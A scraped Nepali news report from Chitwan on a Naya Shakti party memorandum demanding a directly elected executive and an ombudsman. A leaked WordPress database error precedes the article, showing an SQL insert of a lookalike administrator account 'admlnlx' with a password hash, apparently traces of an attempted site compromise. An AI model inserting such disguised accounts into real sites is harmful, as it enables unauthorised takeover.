WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bmu0VWfTChtpqnqdqa1hEpJtny7taT0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-25 02:48:53', '', 'admlnlx', 'admlnlx')
चितवन,पुस २९-
प्रत्यक्ष कार्यकारिको माग गर्दै नयाँ शक्ति चितवनले ज्ञापनपत्र वुझाएको छ । आज चितवनका प्रमुख जिल्ला अधिकारी नारायणप्रसाल भट्टलाई प्रत्यक्ष सरोकारका बिषय समेटेर नयाँ शक्ति पार्टी चितवन जिल्ला सम्मेलन आयोजक समितिले ज्ञापनपत्र वुझाइएको हो ।
ज्ञापनपत्र मार्फत नेपालको शासकीय स्वरुपमा परिवर्तन नगरी राजनीतिक स्थायित्व, बिकास र समृद्धि सम्भव नभएकोले प्रत्यक्ष निर्वाचित कार्यकारी, पुर्ण समानुपातिक संसद रहने व्यवस्था कायम गर्न माग गरिएको छ ।साथै ज्ञापनपत्र मार्फत भ्रष्टाचार बिरुद्धको अभियानमा शुन्य सहनशीलता, पारदर्शिता र शुसासनका लागि संविधान संशोधन गरि शक्तिशाली स्वायत्त संवैधानिक लोकपाल गठन गर्न माग गरिएको छ ।